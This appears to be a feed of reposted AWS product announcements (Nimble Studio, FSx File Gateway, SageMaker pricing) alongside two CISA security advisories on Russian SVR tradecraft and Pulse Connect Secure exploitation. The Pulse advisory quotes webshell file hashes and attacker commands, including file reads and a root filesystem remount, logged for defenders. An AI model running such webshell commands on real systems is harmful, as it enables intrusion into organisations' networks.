Amazon Nimble Studio – Build a Creative Studio in the Cloud

This post was originally published on this site

Amazon Nimble Studio is a new service that creative studios can use to produce visual effects, animations, and interactive content entirely in the cloud with AWS, from the storyboard sketch to the final deliverable. Nimble Studio provides customers with on-demand access to virtual workstations, elastic file storage, and render farm capacity. It also provides built-in automation tools for IP security, permissions, and collaboration.

Traditional creative studios often face the challenge of attracting and onboarding talent. Talent is not localized, and it’s important to speed up the hiring of remote artists and make them as productive as if they were in the same physical space. It’s also important to allow distributed teams to use the same workflow, software, licenses, and tools that they use today, while keeping all assets secure.

In addition, traditional customers resort to buying more hardware for their local render farms, rent hardware at a premium, or extend their capacity with cloud resources. Those who decide to render on the cloud navigate these options and the large breadth of AWS offerings and perceive complexity, which can lead them to choose legacy approaches.

Screenshot of maya lighting

Today, we are happy to announce the launch of Amazon Nimble Studio, a service that addresses these concerns by providing ready-made IT infrastructure as a service, including workstations, storage, and rendering.

Nimble Studio is part of a broader portfolio of purpose-built AWS capabilities for media and entertainment use cases, including AWS services, AWS and Partner Solutions, and over 400 AWS Partners. You can learn more about our AWS for Media & Entertainment initiative, also launched today, which helps media and entertainment customers easily identify industry-specific AWS capabilities across five key business areas: Content production, Direct-to-consumer and over-the-top (OTT) streaming, Broadcast, Media supply chain and archive, and Data science and Analytics.

Benefits of using Nimble Studio
Nimble Studio is built on top of AWS infrastructure, ensuring performant computing power and security of your data. It also enables an elastic production, allowing studios to scale the artists’ workstations, storage, and rendering needs based on demand.

When using Nimble Studio, artists can use their favorite creative software tools on an Amazon Elastic Compute Cloud (EC2) virtual workstation. Nimble Studio uses EC2 for compute, Amazon FSx for storage, AWS Single Sign-On for user management, and AWS Thinkbox Deadline for render farm management.

Nimble Studio is open and compatible with most storage solutions that support the NFS/SMB protocol, such as Weka.io and Qumulo, so you can bring your own storage.

For high-performance remote display, the service uses the NICE DCV protocol and provisions G4dn instances that are available with NVIDIA GPUs.

By providing the ability to share assets using globally accessible data storage, Nimble Studio makes it possible for studios to onboard global talent. And Nimble Studio centrally manages licenses for many software packages, reduces the friction of onboarding new artists, and enables predictable budgeting.

In addition, Nimble Studio comes with an artist-friendly console. Artists don’t need to have an AWS account or use the AWS Management Console to do their work.

But my favorite thing about Nimble Studio is that it’s intuitive to set up and use. In this post, I will show you how to create a cloud-based studio.

screenshot of the intro of nimble studio

 

Set up a cloud studio using Nimble Studio
To get started with Nimble Studio, go to the AWS Management Console and create your cloud studio. You can decide if you want to bring your existing resources, such as file storage, render farm, software license service, Amazon Machine Image (AMI), or a directory in Active Directory. Studios that migrate existing projects can use AWS Snowball for fast and secure physical data migration.

Configure AWS SSO
For this configuration, choose the option where you don’t have any existing resources, so you can see how easy it is to get started. The first step is to configure AWS SSO in your account. You will use AWS SSO to assign the artists permissions based on some roles to access the studio. To set up AWS SSO, follow these steps in the AWS Directory Services console.

Configure your studio with StudioBuilder
StudioBuilder is a tool that will help you to deploy your studio simply by answering some configuration questions. StudioBuilder is available in an AMI. You can get it for free from the AWS Marketplace.

After you get the AMI from AWS Marketplace, you can find it in your Private images list in the EC2 console. Launch that AMI in an EC2 instance. I recommend a t3.medium instance. Set the Auto-assign Public IP field to Enable to ensure that your instance receives a public IP address. You will use it later to connect to the instance.

Screenshot of launching the StudioBuilder AMI

As soon as you connect to the instance, you are directed to the StudioBuilder setup.

Screenshot of studio builder setup

The setup guides you, step by step through the configuration of networking, storage, Active Directory, and rendering farm. Simply answer the questions to build the right studio for your needs.

Screenshot of the studio building

The setup takes around 90 minutes. You can monitor the progress using the AWS CloudFormation console. Your studio is ready when four new CloudFormation stacks have been created in your account: Network, Data, Service, and Compute.

Screenshot of stacks completed in CloudFormation

Now terminate the StudioBuilder instance and return to the Nimble Studio console. In Studio setup, you can see that you’ve completed four of the five steps.

Screenshot of the studio setup tutorial

Assign access to studio admin and users
To complete the last step, Step 5: Allow studio access, you will use the Active Directory directory you created during the StudioBuilder step and the AWS SSO you configured earlier to allow access to the administrators and artists to the studio.

Follow the instructions in the Nimble Studio console to connect the directory to AWS SSO. Then you can add administrators to your studio. Administrators have control over what users can do in the studio.

At this point, you can add users to the studio, but because your directory doesn’t have users yet, move to the next step. You can return to this step later to add users to the studio.

Accessing the studio for the first time
When you open the studio for the first time, you will find the Studio URL in the Studio Manager console. You will share this URL with your artists when the studio is ready. To sign in to the studio, you need the user name and password of the Admin you created earlier.

Screenshot of studio name

Launch profiles
When the studio opens, you will see two launch profiles: one that is a render farm instance and the other that is a workstation. They were created by StudioBuilder when you set up the studio. Launch profiles control access to resources in your studio, such as compute farms, shared file systems, instance types, and AMIs. You can use the Nimble Studio console to create as many launch profiles as you need, to customize your team’s access to the studio resources.

Screenshot of the studio

When you launch a profile, you launch a workstation that includes all the software you provided in the installed AMI. It takes a few minutes for the instance to launch for the first time. When it is ready, you will see the instance in the browser. You can sign in to it with the same user name and password you use to sign in to the studio.

Screenshot of launching a new instance

Now your studio is ready! Before you share it with your artists, you might want to configure more launch profiles, add your artist users to the directory, and give those users permissions to access the studio and launch profiles.

Here’s a short video that describes how Nimble Studio can help you and works:

Available now
Nimble Studio is now available in the US West (Oregon), US East (N. Virginia), Canada (Central), Europe (London), Asia Pacific (Sydney) Regions and the US West (Los Angeles) Local Zone.

Learn more about Amazon Nimble Studio and get started building your studio in the cloud.

Marcia

Get Started Using Amazon FSx File Gateway for Fast, Cached Access to File Server Data in the Cloud

This post was originally published on this site

As traditional workloads continue to migrate to the cloud, some customers have been unable to take advantage of cloud-native services to host data typically held on their on-premises file servers. For example, data commonly used for team and project file sharing, or with content management systems, has needed to reside on-premises due to issues of high latency, or constrained or shared bandwidth, between customer premises and the cloud.

Today, I’m pleased to announce Amazon FSx File Gateway, a new type of AWS Storage Gateway that helps you access data stored in the cloud with Amazon FSx for Windows File Server, instead of continuing to use and manage on-premises file servers. Amazon FSx File Gateway uses network optimization and caching so it appears to your users and applications as if the shared data were still on-premises. By moving and consolidating your file server data into Amazon FSx for Windows File Server, you can take advantage of the scale and economics of cloud storage, and divest yourself of the undifferentiated maintenance involved in managing on-premises file servers, while Amazon FSx File Gateway solves issues around latency and bandwidth.

Replacing On-premises File Servers
Amazon FSx File Gateway is an ideal solution to consider when replacing your on-premises file servers. Low-latency access ensures you can continue to use latency-sensitive on-premises applications, and caching conserves shared bandwidth between your premises and the cloud, which is especially important when you have many users all attempting to access file share data directly.

You can attach an Amazon FSx file system and present it through a gateway to your applications and users provided they are all members of the same Active Directory domain, and the AD infrastructure can be hosted in AWS Directory Service, or managed on-premises.

Your data, as mentioned, resides in Amazon FSx for Windows File Server, a fully managed, highly reliable and resilient file system, eliminating the complexity involved in setting up and operating file servers, storage volumes, and backups. Amazon FSx for Windows File Server provides a fully native Windows file system in the cloud, with full Server Message Block (SMB) protocol support, and is accessible from Windows, Linux, and macOS systems running in the cloud or on-premises. Built on Windows Server, Amazon FSx for Windows File Server also exposes a rich set of administrative features including file restoration, data deduplication, Active Directory integration, and access control via Access Control Lists (ACLs).

Choosing the Right Gateway
You may be aware of Amazon S3 File Gateway (originally named File Gateway), and might now be wondering which type of workload is best suited for the two gateways:

  • With Amazon S3 File Gateway, you can access data stored in Amazon Simple Storage Service (S3) as files, and it’s also a solution for file ingestion into S3 for use in running object-based workloads and analytics, and for processing data that exists in on-premises files.
  • Amazon FSx File Gateway, on the other hand, is a solution for moving network-attached storage (NAS) into the cloud while continuing to have low-latency, seamless access for your on-premises users. This includes two general-purpose NAS use-cases that use the SMB file protocol: end-user home directories and departmental or group file shares. Amazon FSx File Gateway supports multiple users sharing files, with advanced data management features such as access controls, snapshots for data protection, integrated backup, and more.

One additional unique feature I want to note is Amazon FSx File Gateway integration with backups. This includes backups taken directly within Amazon FSx and those coordinated by AWS Backup. Prior to a backup starting, Amazon FSx for Windows File Server communicates with each attached gateway to ensure any uncommitted data gets flushed. This helps further reduce your administrative overhead and worries when moving on-premises file shares into the cloud.

Working with Amazon FSx File Gateway
Amazon FSx File Gateway is available using multiple platform options. You can order and deploy a hardware appliance into your on-premises environment, deploy as a virtual machine into your on-premises environment (VMware ESXi, Microsoft Hyper-V, Linux KVM), or deploy in cloud as an Amazon Elastic Compute Cloud (EC2) instance. The available options are displayed as you start to create a gateway from the AWS Storage Gateway Management Console, together with setup instructions for each option.

Below, I choose to use an EC2 instance for my gateway.

FSx File Gateway platform options

The process of setting up a gateway is pretty straightforward and as the documentation here goes into detail, I’m not going to repeat the flow in this post. Essentially, the steps involved are to first create a gateway, then join it to your domain. Next, you attach an Amazon FSx file system. After that, your remote clients can work with the data on the file system, but the important difference is that they connect using a network share to the gateway instead of to the Amazon FSx file system.

Below is the general configuration for my gateway, created in US East (N. Virginia).

FSx File Gateway Details

And here are the details of my Amazon FSx file system, running in an Amazon Virtual Private Cloud (VPC) in US East (N. Virginia), that will be attached to my gateway.

FSx File System Details

Note that I have created and activated the gateway in the same region as the source Amazon FSx file system, and will manage the gateway from US East (N. Virginia). The gateway virtual machine (VM) is deployed as an EC2 instance running in a VPC in our remote region, US West (Oregon). I’ve also established a peering connection between the two VPCs.

Once I have attached the Amazon FSx file system to my Amazon FSx File Gateway, in the AWS Storage Gateway Management Console I select FSx file systems and then the respective file system instance. This gives me the details of the command needed by my remote users to connect to the gateway.

Viewing the attached Amazon FSx File System

Exploring an End-user Scenario with Amazon FSx File Gateway
Let’s explore a scenario that may be familiar to many readers, that of a “head office” that has moved its NAS into the cloud, with one or more “branch offices” in remote locations that need to connect to those shares and the files they hold. In this case, my head office/branch office scenario is for a fictional photo agency, and is set up so I can explore the gateway’s cache refresh functionality. For this, I’m imagining a scenario where a remote user deletes some files accidentally, and then needs to contact an admin in the head office to have them restored. This is possibly a fairly common scenario, and one I know I’ve had to both request, and handle, in my career!

My head office for my fictional agency is located in US East (N. Virginia) and the local admin for that office (me) has a network share attached to the Amazon FSx file system instance. My branch office, where my agency photographers work, is located in the US West (Oregon) region, and users there connect to my agency’s network over a VPN (an AWS Direct Connect setup could also be used). In this scenario, I simulate the workstations at each office using Amazon Elastic Compute Cloud (EC2) instances.

In my fictional agency, photographers upload images to my agency’s Amazon FSx file system, connected via a network share to the the gateway. Even though my fictional head office, and the Amazon FSx file system itself are resources located on the east coast, the gateway and its cache provide a fast, low latency connection for users in the remote branch office, making it seem as though there is a local NAS. After photographers upload images from their assignments, additional staff in the head office do some basic work on them, and make the partly-processed images available back to the photographers on the west coast via the file share.

The image below illustrates the resource setup for my fictional agency.

My sample head/branch office setup, as AWS resources

I have set up scheduled multiple daily backups for the file system, as you might expect, but I’ve also gone a step further and enabled shadow copies on my Amazon FSx file system. Remember, Amazon FSx for Windows File Server is a Windows File Server instance, it just happens to be running in the cloud. You can find details of how to set up shadow copies (which are not enabled by default) in the documentation here. For the purposes of the fictional scenario in this blog post, I set up a schedule so that my shadow copies are taken every hour.

Back to my fictional agency. One of my photographers on the west coast, Alice, is logged in and working with a set of images that have already had some work done on them by the head office. In this image, it’s apparent Alice is connected and working on her images via the network share IP marked in an earlier image in this post – this is the gateway file share.

Suddenly, disaster strikes and Alice accidentally deletes all of the files in the folder she was working in. Picking up the phone, she calls the admin (me) in the east coast head office and explains the situation, wondering if we can get the files back.

Since I’d set up scheduled daily backups of the file system, I could probably restore the deleted files from there. This would involve a restore to a new file system, then copying the files from that new file system to the existing one (and deleting the new file system instance afterwards). But, having enabled shadow copies, in this case I can restore the deleted files without resorting to the backups. And, because I enabled automated cache refreshes on my gateway, with the refresh period set to every 5 minutes, Alice will see the restored files relatively quickly.

My admin machine (in the east coast office) has a network share to the Amazon FSx file system, so I open an explorer view onto the share, right-click the folder in question, and select Restore previous versions. This gives me a dialog where I can select the most recent shadow copy.

Restoring the file data from shadow copies

I ask Alice to wait 5 minutes, then refresh her explorer view. The changes in the Amazon FSx file system are propagated to the cache on the gateway and sure enough, she sees the files she accidentally deleted and can resume work. (When I saw this happen for real in my test setup, even though I was expecting it, I let out a whoop of delight!). Overall, I hope you can see how easy it is to set up and operate an Amazon FSx File Gateway with an Amazon FSx for Windows File Server.

Get Started Today with Amazon FSx File Gateway
Amazon FSx File Gateway provides a low-latency, efficient connection for remote users when moving on-premises Windows file systems into the cloud. This benefits users who experience higher latencies, and shared or limited bandwidth, between their premises and the cloud. Amazon FSx File Gateway is available today in all commercial AWS regions where Amazon FSx for Windows File Server is available. It’s also available in the AWS GovCloud (US-West) and AWS GovCloud (US-East) regions, and the Amazon China (Beijing), and China (Ningxia) regions.

You can learn more on this feature page, and get started right away using the feature documentation.

AA21-116A: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders

This post was originally published on this site

Original release date: April 26, 2021

Summary

The Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium—will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled “Russian SVR Targets U.S. and Allied Networks,” released on April 15, 2021.

The FBI and DHS are providing information on the SVR’s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.

Click here for a PDF version of this report.

Threat Overview

SVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors’ ability to move within victim environments undetected.

Beginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.

Technical Details

SVR Cyber Operations Tactics, Techniques, and Procedures

Password Spraying

In one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a “low and slow” manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.

The organization unintentionally exempted the compromised administrator’s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.

The actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple’s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.

While the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.

During the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. 

Recommendations

To defend from this technique, the FBI and DHS recommend network operators to follow best practices for configuring access to cloud computing environments, including:

  • Mandatory use of an approved multi-factor authentication solution for all users from both on premises and remote locations.
  • Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.
  • Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.
  • Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.
  • Regularly review the organization’s password management program.
  • Ensure the organization’s information technology (IT) support team has well-documented standard operating procedures for password resets of user account lockouts.
  • Maintain a regular cadence of security awareness training for all company employees.

Leveraging Zero-Day Vulnerability

In a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.

The actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.

Following initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.

Recommendations

To defend from this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:

  • Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP.
  • Ensure host based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.
  • Require use of multi-factor authentication to access internal systems.
  • Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization’s security baseline and incorporate into enterprise monitoring tools.

WELLMESS Malware

In 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI’s investigation revealed that following initial compromise of a network—normally through an unpatched, publicly-known vulnerability—the actors deployed WELLMESS. Once on the network, the actors targeted each organization’s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion have been previously released and are referenced in the ‘Resources’ section of this document.

Tradecraft Similarities of SolarWinds-enabled Intrusions

During the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR’s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR’s historic tradecraft.

The FBI’s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.

Recommendations

Although defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including:

  • Auditing log files to identify attempts to access privileged certificates and creation of fake identify providers.
  • Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.
  • Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.
  • Using available public resources to identify credential abuse within cloud environments.
  • Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.

While few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly “zero trust” architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.

General Tradecraft Observations

SVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.

The FBI also notes SVR cyber operators have used open source or commercially available tools continuously, including Mimikatz—an open source credential-dumping too—and Cobalt Strike—a commercially available exploitation tool.

Mitigations

The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.

Resources

Revisions

  • April 26, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Major News Events

This post was originally published on this site

When a major news event happens, cyber criminals will take advantage of the incident and send phishing emails with a subject line related to the event. These phishing emails often include a link to malicious websites, an infected attachment or are a scam designed to trick you out of your money.

Decrease Your Machine Learning Costs with Instance Price Reductions and Savings Plans for Amazon SageMaker

This post was originally published on this site

Launched at AWS re:Invent 2017, Amazon SageMaker is a fully-managed service that has already helped tens of thousands of customers quickly build and deploy their machine learning (ML) workflows on AWS.

To help them get the most ML bang for their buck, we’ve added a string of cost-optimization services and capabilities, such as Managed Spot Training, Multi-Model Endpoints, Amazon Elastic Inference, and AWS Inferentia. In fact, customers find that the Total Cost of Ownership (TCO) for SageMaker over a three-year horizon is 54% lower compared to other cloud-based options, such as self-managed Amazon EC2 and AWS-managed Amazon EKS.

Since there’s nothing we like more than making customers happy by saving them money, I’m delighted to announce:

  • A price reduction for CPU and GPU instances in Amazon SageMaker,
  • The availability of Savings Plans for Amazon SageMaker.

Reducing Instance Prices in Amazon SageMaker
Effective today, we are dropping the price of several instance families in Amazon SageMaker by up to 14.2%.

This applies to:

Detailed pricing information is available on the Amazon SageMaker pricing page.

As welcome as price reductions are, many customers have also asked us for a simple and flexible way to optimize SageMaker costs for all instance-related activities, from data preparation to model training to model deployment. In fact, as a lot of customers are already optimizing their compute costs with Savings Plans, they told us that they’d love to do the same for their Amazon SageMaker costs.

Introducing SageMaker Savings Plans
Savings Plans for AWS Compute Services were launched in November 2019 to help customers optimize their compute costs. They offer up to 72% savings over the on-demand price, in exchange for your commitment to use a specific amount of compute power (measured in $ per hour) for a one- or three-year period. In the spirit of self-service, you have full control on setting up your plans, thanks to recommendations based on your past consumption, to usage reports, and to budget coverage and utilization alerts.

SageMaker Savings Plans follow in these footsteps, and you can create plans that cover ML workloads based on:

Savings Plans don’t distinguish between instance families, instance types, or AWS regions. This makes it easy for you to maximize savings regardless of how your use cases and consumption evolve over time, and you can save up to 64% compared to the on-demand price.

For example, you could start with small instances in order to experiment with different algorithms on a fraction of your dataset. Then, you could move on to preparing data and training at scale with larger instances on your full dataset. Finally, you could deploy your models in several AWS regions to serve low-latency predictions to your users. All these activities would be covered by the same Savings Plan, without any management required on your side.

Understanding Savings Plans Recommendations
Savings Plans provides you with recommendations that make it easy to find the right plan. These recommendations are based on:

  • Your SageMaker usage in the last 7, 30 or 60 days. You should select the time period that best represents your future usage.
  • The term of your plan: 1-year or 3-year.
  • Your payment option: no upfront, partial upfront (50% or more), or all upfront. Some customers prefer (or must use) this last option, as it gives them a clear and predictable view of their SageMaker bill.

Instantly, you’ll see what your optimized spend would be, and how much you could start saving per month. Savings Plans also suggest an hourly commitment that maximizes your savings. Of course, you’re completely free to use a different commitment, starting as low as $0.001 per hour!

Once you’ve made up your mind, you can add the plan to your cart, submit it, and start enjoying your savings.

Now, let’s do a quick demo, and see how I could optimize my own SageMaker spend.

Recommending Savings Plans for Amazon SageMaker
Opening the AWS Cost Management Console, I see a Savings Plans menu on the left.

Cost management console

Clicking on Recommendations, I select SageMaker Savings Plans.

Looking at the available options, I select Payer to optimize cost at the Organizations level, a 1-year term, a No upfront payment, and 7 days of past usage (as I’ve just ramped up my SageMaker usage).

SageMaker Savings Plan

Immediately, I see that I could reduce my SageMaker costs by 20%, saving $897.63 every month. This would only require a 1-year commitment of $3.804 per hour.

SageMaker Savings Plan

The monthly charge on my AWS bill would be $2,776 ($3.804 * 24 hours * 365 days / 12 months), plus any additional on-demand costs should my actual usage exceed the commitment. Pretty tempting, especially with no upfront required at all.

Moving to a 3-year plan (still no upfront), I could save $1,790.19 per month, and enjoy 41% savings thanks to a $2.765 per hour commitment.

SageMaker Savings Plan

I could add this plan to the cart as is, and complete my purchase. Every month for 3 years, I would be charged $2,018 ($2.765 * 24 * 365 / 12), plus additional on-demand cost.

As mentioned earlier, I can also create my own plan in just a few clicks. Let me show you how.

Creating Savings Plans for Amazon SageMaker
In the left-hand menu, I click on Purchase Savings Plans and I select SageMaker Savings Plans.

SageMaker Savings Plan

I pick a 1-year term without any upfront. As I expect to rationalize my SageMaker usage a bit in the coming months, I go for a commitment of $3 per hour, instead of the $3.804 recommendation. Then, I add the plan to the cart.

SageMaker Savings Plan

Confirming that I’m fine with an optimized monthly payment of $2,190, I submit my order.

SageMaker Savings Plan

The plan is now active, and I’ll see the savings on my next AWS bill. Thanks to utilization reports available in the Savings Plans console, I’ll also see the percentage of my commitment that I’ve actually used. Likewise, coverage reports will show me how much of my eligible spend has been covered by the plan.

Getting Started
Thanks to price reductions for CPU and GPU instances and to SageMaker Savings Plans, you can now further optimize your SageMaker costs in an easy and predictable way. ML on AWS has never been more cost effective.

Price reductions and SageMaker Savings Plans are available today in the following AWS regions:

  • Americas: US East (N. Virginia), US East (Ohio), US West (Oregon), US West (N. California), AWS GovCloud (US-West), Canada (Central), South America (São Paulo).
  • Europe, Middle East and Africa: Europe (Ireland), Europe (Frankfurt), Europe (London), Europe (Paris), Europe (Stockholm), Europe (Milan), Africa (Cape Town), Middle East (Bahrain).
  • Asia Pacific: Asia Pacific (Singapore), Asia Pacific (Tokyo), Asia Pacific (Sydney), Asia Pacific (Seoul), Asia Pacific (Mumbai), and Asia Pacific (Hong Kong).

Give them a try, and let us know what you think. As always, we’re looking forward to your feedback. You can send it to your usual AWS Support contacts, or on the AWS Forum for Amazon SageMaker.

– Julien

 

 

AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities

This post was originally published on this site

Original release date: April 20, 2021

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Ivanti Integrity Checker Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.

Ivanti has provided a mitigation and is developing a patch. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the Ivanti Integrity Checker Tool, update to the latest software version, and investigate for malicious activity.

Technical Details

On March 31, 2021, Ivanti released an Integrity Checker Tool to detect the integrity of Pulse Connect Secure appliances. Their technical bulletin states:

We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE- 2020- 8260). For more information visit KB44764 (Customer FAQ).

The suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality:

  • DSUpgrade.pm MD5: 4d5b410e1756072a701dfd3722951907
    • Runs arbitrary commands passed to it
    • Copies malicious code into Licenseserverproto.cgi
  • Licenseserverproto.cgi MD5: 9b526db005ee8075912ca6572d69a5d6
    • Copies malicious logic to the new files during the patching process, allowing for persistence
  • Secid_canceltoken.cgi MD5: f2beca612db26d771fe6ed7a87f48a5a
    • Runs arbitrary commands passed via HTTP requests
  • compcheckresult.cgi MD5: ca0175d86049fa7c796ea06b413857a3
    • Publicly-facing page to send arbitrary commands with ID argument
  • Login.cgi MD5: 56e2a1566c7989612320f4ef1669e7d5
    • Allows for credential harvesting of authenticated users
  • Healthcheck.cgi MD5: 8c291ad2d50f3845788bc11b2f603b4a
    • Runs arbitrary commands passed via HTTP requests

Other files were found with additional functionality:

  • libdsplibs.so MD5: 416488b6c8a9bdb9c0cb592e36f44677
    • Trojanized shared object to bypass multi-factor authentication via a hard-coded backdoor key.

Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log as seen in the following format, URIs have been redacted to minimize access to webshells that may still be active:

Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.

The threat actor then ran the commands listed in table 1 via the webshell.

Table 1: Commands run via webshell

Time Command
2021-01-19T07:46:05.000+0000 pwd
2021-01-19T07:46:24.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T08:10:13.000+0000 cat%20/home/webserver/htdocs/dana-na/l[redacted]
2021-01-19T08:14:18.000+0000 See Appendix.
2021-01-19T08:15:11.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T08:15:49.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T09:03:05.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T09:04:47.000+0000 $mount
2021-01-19T09:05:13.000+0000 /bin/mount%20-o%20remount,rw%20/dev/root%20/
2021-01-19T09:07:10.000+0000 $mount

 

The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity.

Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.

Mitigations

CISA strongly urges organizations using Pulse Secure devices to immediately:

If the Integrity Checker Tools finds mismatched or unauthorized files, CISA urges organizations to:

  • Contact CISA to report your findings (see Contact Information section below).
  • Contact Ivanti Pulse Secure for assistance in capturing forensic information.
  • Review “Unauthenticated Web Requests” log for evidence of exploitation, if enabled.
